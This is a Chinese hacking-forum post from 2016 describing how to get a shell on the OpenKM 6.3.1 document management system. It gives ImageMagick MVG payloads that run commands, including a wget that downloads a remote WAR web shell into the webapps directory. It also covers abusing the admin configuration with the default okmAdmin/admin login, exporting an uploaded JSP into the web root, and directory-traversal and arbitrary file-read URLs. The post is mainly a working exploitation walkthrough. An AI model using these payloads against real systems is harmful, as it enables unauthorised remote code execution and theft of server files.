HanDs
管理员

[入侵交流] [拿shell方法] OPenKM文档管理系统getshell尝试 





学习中请遵循国家相关法律法规,黑客不作恶。没有网络安全就没有国家安全

本站需要登陆后才能查看

OpenKM简介: 
OpenKM是一个文档管理系统,用于组织和共享文档。可以通过名称,内容,关键字等来搜索文档。 
l.png 
因为业务需要,工头说我们内部也要整上一个文档管理系统,用于存放搬砖的过程文档。 

测试版本:openkm-6.3.1-community 
验证过程描述: 
OpenKM默认的用户权限有两个ROLE_ADMIN和ROLE_USER,默认有一个okmAdmin(密码 admin)的ROLE_ADMIN管理员权限用户; 

1.Linux运行环境 
(1)ROLE_USER 普通用户,可以登入,无管理权限; 
1.png 
user用户的权限,可以上传文档,经过个人的尝试,并没有发现可以利用的地方; 
尽管存在zip文件的解包上传,但是也没有通过目录穿越 
2.png 
后来想到了有的安装文档,提到了ImageMagick,于是尝试ImageMagick的RCE 
push graphic-context 
viewbox 0 0 640 480 
fill 'url(https://"|touch /tmp/sex.sex; ")' 
pop graphic-context

上传该图片,点击图片—Preview即可触发; 
3.png 
效果,虽然有报错,但是sex.sex生成了: 
4.png 
获取shell的方式就比较简单了,和之前一样wget 
push graphic-context 
viewbox 0 0 640 480 
fill 'url(https://"|wget -O ../webapps/is.war http://remoteweb/is.war.zip ")' 
pop graphic-context

5.png 
shell link(直接部署了一个is.war): 
6.png 
http://IP:8080/is/ 
其他getshell的方式,本人能力限制,还请大牛分享啊! 

(2)ROLE_ADMIN 管理员用户,可以登入管理面板; 
    如果没有ImageMagick,在管理面板可以使用的是“修改配置”的方法,使用默认的okmAdmin登录; 
多一个administration的面板 
7.png 
进入管理面板,在config的配置 
8.png 
我们可以修改某些调用外部程序的配置,比如之前的ImageMagick的路径 
9.png 
修改如下: 
wget -O ../webapps/haha.war http://remoteip/is.war.zip 
11.png 
然后和前面一样,去上传一张正常的图片,preview即可触发 
12.png 
效果如下: 
13.png 

如果安装环境不是Linux 而是没有ImageMagick RCE也没有wget的windows环境呢。 
2. windows环境 
ROLE_ADMIN权限用户(ROLE_USER权限的用户~本菜~搞不定) 
同样需要在管理面板操作,他有一个EXport功能,可以将文档管理系统的文件导出到指定目录 
(openkm系统中存放的文件是没有扩展名的,也不在web直接访问的路径中,导出文件可以将文件还原成源文件,比如你之前上传的a.jsp,上传之后变成了aada-adad-23223-23223-dfdf,导出就可以变成a.jsp了) 
比如把jsp脚本导出到web目录; 
目录遍历(ROLE_USER权限即可): 
linux 路径:/OpenKM/extension/DataBrowser?action=fs&dst=fsPath&sel=both&root=&path=/ 
win路径:/OpenKM/extension/DataBrowser?action=fs&dst=fsPath&sel=both&root=&path=C:\ 
15.png 
总是会找到openkm的安装路径的。 
找到路径之后,在desktop面板上传jsp脚本,一般生产环境的Path : /okm:root/的文件较多,导出操作可能会异常,可以将文件move到较少的路径; 
16.png 
导出操作: 
填写好对应的路径, 
17.png 
Export执行 
18.png 
效果如下: 
19.png 

以上方法同样适用于Linux环境; 
此外还有一个import导入的功能,可以将系统的目录导入到openkm中,算是文件读取; 
LogCat功能也存在任意文件下载和读取,都是常见的利用方式, 
20.png 
/OpenKM/admin/LogCat?action=view&file=..%2Fconf%2Fserver.xml&begin=0&end=100&str=
/OpenKM/admin/LogCat?action=download&file=localhost_access_log.2016-06-15.txt 
最大的难点还是在如何获取ROLE_ADMIN的管理员帐号密码, 


学习中请遵守法律法规,本网站内容均来自于互联网,本网站不负担法律责任
OPenKM 文档管理系统 getshell 尝试
#1楼
发帖时间:2016-7-17   |   查看数:0   |   回复数:0
游客组
快速回复